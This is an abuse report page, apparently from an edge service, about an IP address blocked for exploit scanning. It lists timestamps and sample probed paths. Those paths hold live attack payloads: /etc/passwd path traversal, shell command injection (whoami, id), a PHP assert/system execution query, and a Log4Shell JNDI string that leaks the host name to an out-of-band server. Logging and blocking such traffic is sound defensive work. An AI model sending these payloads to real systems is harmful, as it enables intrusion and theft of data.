abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 53
- Unique targets hit
- 1
- Unique paths probed
- 452
- Detection count
- 1
- First seen
- 2026-06-02 02:17:07 UTC
- Last seen
- 2026-06-02 03:16:39 UTC
- Block expires
- 2026-06-03 03:17:14 UTC
Sample paths probed
- /static/css//../../../../../../../../etc/passwd
- /adminPage/remote/cmdOver
- /direct/polling/CommandsPolling.php
- /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
- /opennms/j_spring_security_check
- /UoyWG.txt
- /reviewInput.php?pid=1
- /boaform/admin/formTracert
- /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php
- /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
- /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
- /css_parser.php?css=css_parser.php
- /Login
- /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
- /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27
- /service_transport/service.action
- /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)
- /AdminPage/conf/runCmd?cmd=id
- /admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
- /login/SAML?=${jndi:ldap://${:-937}${:-647}.${hostName}.username.d8etkbagi86c7t2akv6guefze5doawn5k.dns.watchtowr-oob.com/EY3Km}
Sample User-Agents
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.